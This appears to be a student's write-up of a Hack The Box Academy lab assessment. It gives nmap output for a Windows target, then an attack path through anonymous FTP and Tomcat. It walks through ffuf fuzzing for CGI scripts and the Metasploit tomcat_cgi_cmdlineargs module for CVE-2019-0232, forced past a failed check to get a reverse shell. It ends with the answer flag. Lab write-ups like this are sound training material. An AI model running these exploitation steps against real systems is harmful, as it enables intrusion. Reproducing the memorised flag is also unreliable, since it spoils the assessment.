During a penetration test against the company Inlanefreight, you have performed extensive enumeration and found the network to be quite locked down and well-hardened. You come across one host of particular interest that may be your ticket to an initial foothold. Enumerate the target host for potentially vulnerable applications, obtain a foothold, and submit the contents of the flag.txt file to complete this portion of the skills assessment.

Questions:

What vulnerable application is running?

                                                                                
┌──(sasorirose㉿kazekageiii)-[~/…/HTB_Academy/Attacking_Common_Application/Skils_Assessments/part1]
└─$ sudo nmap -sV -sC 10.129.98.249 -ox nmap.xml
[sudo] password for sasorirose: 
Starting Nmap 7.95 ( https://nmap.org ) at 2026-05-05 01:12 UTC
Failed to resolve "nmap.xml".
Failed to resolve "nmap.xml".
Nmap scan report for 10.129.98.249
Host is up (0.24s latency).
Not shown: 990 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_09-01-21  08:07AM                 website_backup
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Freight Logistics, Inc
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=APPS-SKILLS1
| Not valid before: 2025-12-08T11:28:27
|_Not valid after:  2026-06-09T11:28:27
|_ssl-date: 2026-05-05T02:12:15+00:00; +59m14s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: APPS-SKILLS1
|   NetBIOS_Domain_Name: APPS-SKILLS1
|   NetBIOS_Computer_Name: APPS-SKILLS1
|   DNS_Domain_Name: APPS-SKILLS1
|   DNS_Computer_Name: APPS-SKILLS1
|   Product_Version: 10.0.17763
|_  System_Time: 2026-05-05T02:12:04+00:00
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8000/tcp open  http          Jetty 9.4.42.v20210604
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-server-header: Jetty(9.4.42.v20210604)
8009/tcp open  ajp13         Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open  http          Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.0.M1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-05-05T02:12:10
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: 59m13s, deviation: 0s, median: 59m13s

Failed to resolve "nmap.xml".
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.23 seconds

Summary of Nmap scan:

Target: Windows Server (10.129.98.249)

Critical Findings (Attack Path):

  • Port 21 (FTP): Anonymous login is enabled. Contains a website_backup directory. Start here to download files and hunt for hardcoded credentials.
  • Port 8080 & 8009 (Apache Tomcat 9.0.0.M1): The primary exploitation target. Once you find credentials in the FTP backup, use them to log into the Tomcat Manager on 8080 to upload a reverse shell. Port 8009 (AJP) also suggests it may be vulnerable to Ghostcat.

Secondary Web Targets:

  • Port 8000 (Jetty): Check the robots.txt file for hidden directories.
  • Port 80 (IIS): Standard company website ("Freight Logistics, Inc."). Fuzz for hidden directories if Tomcat fails.

Hold for Later (Requires Credentials):

  • Ports 445 (SMB), 3389 (RDP), 5985 (WinRM): Use these for remote access and lateral movement after you have found valid usernames and passwords.

Answer: Tomcat

What port is this application running on?

Answer: 8080

What version of the application is in use?

Answer: 9.0.0.M1

Exploit the application to obtain a shell and submit the contents of the flag.txt file on the Administrator desktop.

Let's do next to maybe get deep in enumeration for the Tomcat service first and if don’t see anything we continue to enumerate for other services

googling for some PoC and CVE related to this version

checked for RCE exploits for Apache Tomcat 9.0.0.M1 and found a rapid7 article that seemed promising

https://www.rapid7.com/db/vulnerabilities/apache-tomcat-cve-2019-0232/

that led to me goolging CVE-2019-0232 POC and I found

https://github.com/setrus/CVE-2019-0232

which told me there was a metasploit module for this exploit, but ALSO reminded me that I need to fuzz for CGI scripts.

Running FFUF to try and find CGI scripts

┌──(sasorirose㉿kazekageiii)-[~/…/HTB_Academy/Attacking_Common_Application/Skils_Assessments/part1]
└─$ ffuf -u http://10.129.99.6:8080/cgi/FUZZ.bat -w /usr/share/dirb/wordlists/common.txt

Set up to reverse shell at msfconsole

msf exploit(windows/http/tomcat_cgi_cmdlineargs) > set lhost tun0
lhost => tun0
msf exploit(windows/http/tomcat_cgi_cmdlineargs) > set lhost tun0
lhost => tun0
msf exploit(windows/http/tomcat_cgi_cmdlineargs) > set rhosts 10.129.99.6
rhosts => 10.129.99.6
msf exploit(windows/http/tomcat_cgi_cmdlineargs) > set rport 8080
rport => 8080
msf exploit(windows/http/tomcat_cgi_cmdlineargs) > set targeturi /cgi/cmd.bat
targeturi => /cgi/cmd.bat
msf exploit(windows/http/tomcat_cgi_cmdlineargs) >  run

when I attempted to run it, I got the following error:

Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.

because I manually tested the injection myself I felt comfortable setting force exploit to true and when I did that it did work and I got a shell

use : shell to change to powershell and get flag

Answer: f55763d31a8f63ec935abd07aee5d3d0